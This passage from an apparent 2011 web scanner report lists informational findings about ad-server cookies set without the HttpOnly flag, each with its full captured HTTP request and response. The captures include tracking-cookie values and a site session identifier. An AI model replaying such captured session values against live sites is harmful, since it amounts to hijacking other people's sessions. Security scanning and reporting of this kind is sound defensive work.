rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 
udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Gnt="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.20. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000 and rsiPus_oJ6I (cleared, once for Path=/adserver and once for Path=/), then rsiPus_D-6M and rsi_us_1000000 (re-issued with Max-Age=1009152000, about 32 years). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="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"; 
rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=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; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-mu
...[SNIP]...

10.21. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-75921-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-596291-1044587-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_Wdkl=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; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_pcmJ="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdqU="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:32 GMT

GIF89a.............!.......,...........D..;

10.22. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=700;misc=1304949833137 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389; cookiename1=cookievalue1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: BsC=6233986=1304953636,;path=/
Content-Length: 1041

document.write("<scr"+"ipt src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=950036492&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|295188
...[SNIP]...

10.23. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH;cfp=1;rndc=130495000;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=213;misc=1304950001207 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adserver.adtech.de
Cookie: CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7F3676E651A260C6EAF39F01058B1;expires=Wed, 8 May 2013 14:7:47 GMT;domain=adtech.de;path=/
Content-Length: 1897

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

10.24. http://adserver.adtech.de/bind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /bind

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=cookiename1;cvalue1=cookievalue1;expiresDays=90;adct=text/html;misc=123&_=1304949672673 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: cookiename1=cookievalue1;expires=Sun, 7 Aug 2011 14:3:53 GMT;domain=adtech.de;path=/


10.25. http://adserver.clashmusic.com/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.clashmusic.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=863&campaignid=427&zoneid=3&channel_ids=,&loc=http%3A%2F%2Fwww.clashmusic.com%2Fnews%2Fsufjan-stevens-suffered-nervous-breakdown&cb=798191f103 HTTP/1.1
Host: adserver.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; OAID=efeacdd68792e9690c3d24ff4cb687f0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=efeacdd68792e9690c3d24ff4cb687f0; expires=Tue, 08-May-2012 14:01:00 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.26. http://adserver.clashmusic.com/www/delivery/spc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.clashmusic.com
Path:   /www/delivery/spc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5%7C6&source=&r=45574794&channel=Content&charset=UTF-8&loc=http%3A//www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: adserver.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
